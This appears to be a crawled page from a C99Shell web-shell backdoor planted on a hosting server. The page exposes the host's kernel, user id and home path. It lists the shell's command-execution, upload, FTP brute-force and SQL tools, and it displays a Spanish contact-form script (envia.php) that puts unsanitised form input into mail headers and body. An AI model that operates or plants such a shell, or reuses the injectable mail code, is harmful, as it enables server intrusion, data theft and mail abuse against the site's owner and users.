!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.4.33 

uname -a: Linux srv25.cpanelhost.cl 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47
UTC 2023 x86_64
 

uid=1416(cte47424) gid=1421(cte47424) groups=1421(cte47424) 

Safe-mode: OFF (not secure)

/home3/cte47424/public_html/   drwxr-x---
Free 364.37 GB of 738.03 GB (49.37%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     envia.php (1.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// Varios destinatarios
$para  'contacto@tecnocielo.cl';
//$para .= 'wez@example.com';

$nombre=$_POST['nombre'];
$mail=$_POST['mail'];
$comentario=$_POST['comentario'];

// título
$título 'Contacto WEB';

// mensaje
$mensaje '
<html>
<head>
  <title>Contacto WEB</title>
</head>
<body>
  
  <table>
    <tr>
      <td>Nombre</td><td>: '
.$nombre.'</td>
    </tr>
    <tr>
      <td>Correo</td><td>: '
.$mail.'</td>
    </tr>
    <tr>
      <td>Comentario</td><td>: '
.$comentario.' </td>
    </tr>
  </table>
</body>
</html>
'
;

// Para enviar un correo HTML, debe establecerse la cabecera Content-type
$cabeceras  'MIME-Version: 1.0' "\r\n";
$cabeceras .= 'Content-type: text/html; charset=iso-8859-1' "\r\n";

// Cabeceras adicionales
//$cabeceras .= 'To: Mary <mary@example.com>, Kelly <kelly@example.com>' . "\r\n";
$cabeceras .= 'From: '.$nombre.' <'.$para.'>' "\r\n";
//$cabeceras .= 'Cc: birthdayarchive@example.com' . "\r\n";
//$cabeceras .= 'Bcc: birthdaycheck@example.com' . "\r\n";

// Enviarlo
if(mail($para$título$mensaje$cabeceras)){
    echo 
"<script type='text/javascript'>alert('Correo enviado correctamente');location.href='contacto.php';</script>";
}else{
    echo 
"<script type='text/javascript'>alert('Problemas al enviar correo, intentelo nuevamente.');location.href='contacto.php';</script>";
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0033 ]--